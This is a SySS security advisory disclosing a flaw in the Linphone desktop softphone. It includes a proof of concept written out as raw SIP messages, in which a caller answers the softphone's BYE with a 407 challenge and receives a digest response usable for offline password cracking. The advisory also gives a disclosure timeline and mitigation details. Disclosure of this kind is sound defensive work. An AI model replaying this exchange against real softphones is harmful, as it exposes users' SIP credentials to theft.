-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Advisory ID: SYSS-2021-015 Product: Linphone Manufacturer: Belledonne Communications Affected Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19) Tested Version(s): Desktop 4.2.5-Qt5.14.2 (Core4.4.19) Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Risk Level: Medium Solution Status: Mitigation measures provided Manufacturer Notification: 2021-03-26 Solution Date: 2021-09-16 Public Disclosure: 2021-10-13 CVE Reference: - Authors of Advisory: Moritz Abrell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Linphone [1] is an open source SIP-based softphone. It provides calling, presence and IM features. The Linphone is vulnerable to SIP Digest-Authenticaton leakage, resulting in leaking data which can be used to brute force login credentials for the extension of the Linphone SIP account. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: If a SIP INVITE request is sent to the SIP service of the Linphone, the softphone is ringing and signaling an incoming call. If the user is accepting the call and hanging up later, the softphone sends a SIP BYE request to the caller. The caller is now able to respond with a 407 "Proxy Authentication Required" message with authentication parameters, such as realm and nonce value. After that the softphone sends a new SIP BYE request within a complete digest authentication response. This response includes all required parameters to performing an offline password brute-force attack against the Linphone SIP account credentials. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): 1. Attacker sends a SIP INVITE request to the Linphone: INVITE sip:15@192.168.122.168:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.122.1:5060;branch=z9hG4bK-11319 From: ;tag=1 To: Call-ID: 1-11319@192.168.122.1 CSeq: 1 INVITE Contact: sip:100@192.168.122.1:5060 Max-Forwards: 70 Content-Type: application/sdp Content-Length: 137 v=0 o=user1 53655765 2353687637 IN IP4 192.168.122.1 s=- c=IN IP4 192.168.122.1 t=0 0 m=audio 6000 RTP/AVP 0 a=rtpmap:0 PCMU/8000 2. The Linphone is ringing and signals an incoming call. 3. The user accepts the call and hangs up, because of no audio. 4. The Linphone sends a BYE request to the attacker: BYE sip:100@192.168.122.1:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.122.168:5060;branch=z9hG4bK.NMs4g5UQs;rport From: ;tag=DQUs-Xx To: ;tag=1 CSeq: 111 BYE Call-ID: 1-11319@192.168.122.1 Max-Forwards: 70 5. Sending a 407 "Proxy Authentication Required" response with realm and a nonce value: SIP/2.0 407 Proxy Authentication Required Via: SIP/2.0/UDP 192.168.122.168:5060;branch=z9hG4bK.NMs4g5UQs;rport From: ;tag=DQUs-Xx To: ;tag=1 Call-ID: 1-11319@192.168.122.1 CSeq: 111 BYE WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="69d327e5" Content-Length: 0 6. Linphone sends a second BYE request within an "Authorization" header: BYE sip:100@192.168.122.1:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.122.168:5060;branch=z9hG4bK.NMs4g5UQs;rport From: ;tag=DQUs-Xx To: ;tag=1 Call-ID: 1-11319@192.168.122.1 CSeq: 112 BYE Max-Forwards: 70 Authorization: Digest realm="asterisk", nonce="69d327e5", algorithm=MD5, username="123", uri="sip:100@192.168.122.1:5060", response="e2e71ebf70ea859426afcfbc7be4b6b3" The attacker is now able to perform an offline password brute-force attack against the SIP account of Linphone. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer implemented mitigation measures within the commit 742334647fcde614c4126834fa9f59931efb2d59 in the public GitHub repository. Nevertheless, the use of individual and strong passwords is essential and strongly recommended for reducing the success rate of offline password guessing attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-03-26: Vulnerability reported to manufacturer 2021-04-01: Renewed notification to the manufacturer due to lack of feedback 2021-04-07: Renewed notification to the manufacturer due to lack of feedback 2021-05-17: Renewed notification to the manufacturer due to lack of feedback 2021-05-17: Response and confirmation of the vulnerabilities by the manufacturer 2021-09-16: Mitigation measures provided by the manufacturer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1]: Product website for Linphone: https://www.linphone.org/ [2]: SySS Responsible Disclosure Policy: https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmFlm2gACgkQrgyb+PE0 i1Nrjw//V5jgbv1ntclxvNWdIUAig6Z5Qk5i7swtkzFMJWt4GX/Xpf0y1aWfAchR uxpoXvJ3Ry+E0Aws9erX6fHYtJ4t7R1tjq7dEyNLTAU1aZKDi8LhQaLoeBk9Fyl1 Te3paS2hjMeYprmH+rFKTguzEJzijKf28oCq2gxJR+o5i6S9ymuJ5wJnzsQVF930 kj6ObTIgbahnR+NPpt0X3L3zQFua+JYSDRCVufRaaV+25bsmeJu203qjLd0Ral1J sH3NnSArUN7OZbrkd0lrCMvEvhIn0BsztGycy4B3ScnGjHUmfakfNP3JeSbjlgWm oZSun0nALQxgChyZ9JSCSzn0gW9aQlniVKwol51E5DZeh5f3ATpYs1Avwu6giu1Q vGAS+7ihq9EjI6OU9trtXCgXssBhVUsitS15IObgyE3nml77aNgFlq8gf/fnHbAn OMD0hYpwEUKPR00DbU09IX/jpn1Uw6PlZB01P8WsbEpOu7x1HUv8MlH/QC5QjKEJ T7cP1KMZQ2kEVXiUF0c/Tb+JR8b644bslEaJhpjIYgSlxG3VTn2/GDEvIptLEQJO 59AIn2QDfoOwoqTpeFwymuIS3f3pqE3QMAcExza88PHe5LANGQRbuP7fihJgl3b3 z5y3rMF/sahUskz0m3naem6Qi01QrGPOwgNmAmdCefGboefuUiE= =I2GN -----END PGP SIGNATURE-----